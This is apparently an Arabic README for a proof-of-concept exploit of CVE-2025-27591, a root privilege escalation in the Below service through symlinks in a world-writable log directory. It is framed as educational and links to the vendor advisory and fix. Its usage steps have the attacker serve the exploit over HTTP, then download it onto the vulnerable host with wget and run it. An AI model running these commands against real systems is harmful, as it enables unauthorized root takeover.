
CVE-2025-27591 هي ثغرة تصعيد صلاحيات أثرت على خدمة Below قبل الإصدار 0.9.0
CVE-2025-27591 هي ثغرة تصعيد صلاحيات أثرت على خدمة Below قبل الإصدار 0.9.0. نشأت المشكلة بسبب إنشاء مجلد قابل للكتابة عالميًا في /var/log/below. يمكن للمهاجم استغلال هذه الثغرة من خلال التلاعب بالروابط الرمزية داخل هذا المجلد وربما الحصول على صلاحيات الجذر، مما يجعلها مصدر قلق أمني كبير للمستخدمين المحليين غير المميزين.
تمت كتابة هذا الإثبات المفاهيمي لأغراض تعليمية وبحثية فقط.
في وقت الكتابة، لم يكن هناك إثبات مفاهيمي متاح للجمهور لهذه الثغرة في المجتمع. لذلك، قررت مشاركة هذا التنفيذ بمسؤولية لسد هذه الفجوة، والمساهمة في النظام البيئي للبحث الأمني، ورفع الوعي حول الطبيعة الحرجة لنظام الملفات غير الآمن.
من جهاز المهاجم:
1-git clone https://github.com/BridgerAlderson/CVE-2025-27591-PoC.git
2-cd CVE-2025-27591-PoC
3-python3 -m http.server 80
من النظام الضعيف:
1- wget http:///exploit.py
2-python exploit.py
https://www.facebook.com/security/advisories/cve-2025-27591 https://github.com/facebookincubator/below/commit/da9382e6e3e332fd2c3195e22f34977f83f0f1f3